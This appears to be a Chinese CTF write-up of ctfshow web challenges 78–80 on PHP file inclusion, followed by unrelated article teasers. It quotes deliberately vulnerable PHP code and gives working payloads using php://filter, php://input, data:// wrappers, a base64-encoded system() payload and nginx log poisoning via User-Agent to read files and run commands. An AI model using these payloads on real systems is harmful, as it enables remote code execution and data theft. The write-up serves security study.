ctfshow-web文件包含(web78-web86)

张

张建站

2026/4/9 15:46:10

10分钟阅读

ctfshow-web文件包含web78?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-16 10:52:43 # Last Modified by: h1xa # Last Modified time: 2020-09-16 10:54:20 # email: h1xactfer.com # link: https://ctfer.com */ if(isset($_GET[file])){ $file $_GET[file]; include($file); }else{ highlight_file(__FILE__); }由include代码执行file引入文件如果执行不成功就高亮显示源码可知这就是一个没有任何过滤的文件包含的题目方法一filter伪协议file关键字的get参数传递php://是一种协议名称php://filter/是一种访问本地文件的协议/readconvert.base64-encode/表示读取的方式是base64编码后resourceindex.php表示目标文件为index.php。filter伪协议构造payload?filephp://filter/readconvert.base64-encode/resourceflag.php得到base编码后的flag解密得到flagctfshow{d03c9148-23af-48a1-92e1-ad011f98d415}方法二input协议php://input 是 PHP 提供的一个伪协议允许开发者访问 POST 请求的原始内容。对于 POST 请求数据PHP 提供了 $_POST 与 $FILES 超全局变量在客户端发起 POST 请求时PHP 将自动处理 POST 提交的数据并将处理结果存放至 $_POST 与 $FILES 中?php system(ls);?方法三data协议data也是利用文件包含漏洞将输入的代码当作php文件执行。data协议格式data://[MIME-type][;charsetencoding][;base64],data构造payload?filedata://text/plain,?php system(tac f*);?将我们输入的当作php文件来执行以达到读取flag的目的。web79?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-16 11:10:14 # Last Modified by: h1xa # Last Modified time: 2020-09-16 11:12:38 # email: h1xactfer.com # link: https://ctfer.com */ if(isset($_GET[file])){ $file $_GET[file]; $file str_replace(php, ???, $file); include($file); }else{ highlight_file(__FILE__); }发现过滤了php小问题data协议data://text/plain使用到?php ?可以用? ?代替flag.php可以用*或?代替部分字符或是直接使用base64编码?filedata://text/plain,? system(tac fla*) ? ?filedata://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg等于?php system(cat flag.php);ctfshow{e37fa4f8-13aa-40d3-a57e-dd2af3f4030e}php://inputphp用大小写绕过?filePhp://input post: ?php system(tac flag.php); ?当你使用hackbar的时候请使用raw模式发送post请求否则服务端无法接收到post里的内容。日志包含?file/var/log/nginx/access.loguser-agent里写上?php system(ls); ? ?php system(tac fl0g.php); ?web80?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-16 11:25:09 # Last Modified by: h1xa # Last Modified time: 2020-09-16 11:26:29 # email: h1xactfer.com # link: https://ctfer.com */ if(isset($_GET[file])){ $file $_GET[file]; $file str_replace(php, ???, $file); $file str_replace(data, ???, $file); include($file); }else{ highlight_file(__FILE__); }解释首先代码使用isset()函数检查是否存在名为file的GET参数。如果存在代码将获取该参数的值并赋给变量$file。然后代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file变量进行两次替换操作。第一次替换将file中的php字符串替换为???第二次替换将file中的data字符串替换为???。最后代码使用include()函数来包含$file变量所代表的文件。发现是nginx服务器所以我们尝试访问这个日志/var/log/nginx/access.log

Phi-3-mini-128k-instruct效果对比：vs Phi-3-4K在长文本摘要任务中的质量差异

Phi-3-mini-128k-instruct效果对比：vs Phi-3-4K在长文本摘要任务中的质量差异 1. 模型简介与背景 Phi-3-Mini-128K-Instruct是一个38亿参数的轻量级开放模型，属于Phi-3系列的最新成员。该模型使用专门设计的Phi-3数据集进行训练，该数据集包…...

2026/4/9 15:45:25 阅读更多 →

vuejs-datepicker禁用日期功能详解：7种禁用策略实战应用

vuejs-datepicker禁用日期功能详解：7种禁用策略实战应用【免费下载链接】vuejs-datepicker A simple Vue.js datepicker component. Supports disabling of dates, inline mode, translations 项目地址: https://gitcode.com/gh_mirrors/vu/vuejs-datepicker …...

2026/4/9 15:40:33 阅读更多 →

Neeshck-Z-lmage_LYX_v2效果展示：Z-Image底座对中文文化元素的理解优势

Neeshck-Z-lmage_LYX_v2效果展示：Z-Image底座对中文文化元素的理解优势 1. 引言：当AI画笔遇见东方神韵想象一下，你输入“一位身着汉服的少女，在江南水乡的烟雨中抚琴”，AI生成的画面里，汉服的衣袂飘飘、…...

2026/4/9 15:40:20 阅读更多 →

基于MATLAB的轮轨接触几何计算GUI程序设计与实现

1-148 matlab的带有gui的轮轨接触几何计算程序基于matlab的带有gui的轮轨接触几何计算程序,根据不同的踏面和轨头，计算不同横移量下面的接触点位置。程序已调通，可直接运行有没有人蹲过现成的、换文件就能换轮轨、不用啃半天赫兹接触前的几何方程、结果还…...

2026/4/5 0:00:53 阅读更多 →

【CPP 深度学习】PyTorch On CPP 系列课程第一章 01 ：入门与环境搭建【Ai Infra 3.0】[PyTorch CPP LibTorch 硕士研一课程]

章节 1: PyTorch ON Cpp入门与环境搭建本章将为PyTorch的使用做好准备。我们首先会配置必要的软件和环境。接着，主要内容将转向PyTorch的核心数据结构：张量。您将学习如何： 使用常用包管理器安装PyTorch。配置适合PyTorch项目的开发环境…...

2026/4/5 0:05:12 阅读更多 →

4DGL-uLCD-SE：轻量级嵌入式GUI驱动框架

1. 项目概述4DGL-uLCD-SE 是一个面向嵌入式系统设计的轻量级、可移植的图形用户界面（GUI）驱动框架，专为 4D Systems 公司推出的 uLCD 系列智能显示模块（如 uLCD-320GL, uLCD-70DT, uLCD-43PT 等）而构建。该库并非直接操…...

2026/4/5 0:34:09 阅读更多 →

电源逆变结构设计与选型指南

1. 电源逆变结构概述作为一名硬件工程师，我在过去十年里设计过各种电源转换电路。电源逆变结构是电力电子领域的核心内容，它决定了电能转换的效率、可靠性和成本。简单来说，电源逆变就是将直流电(DC)转换为交流电(AC)的过程，这在太…...

2026/4/5 0:34:18 阅读更多 →

更多精彩文章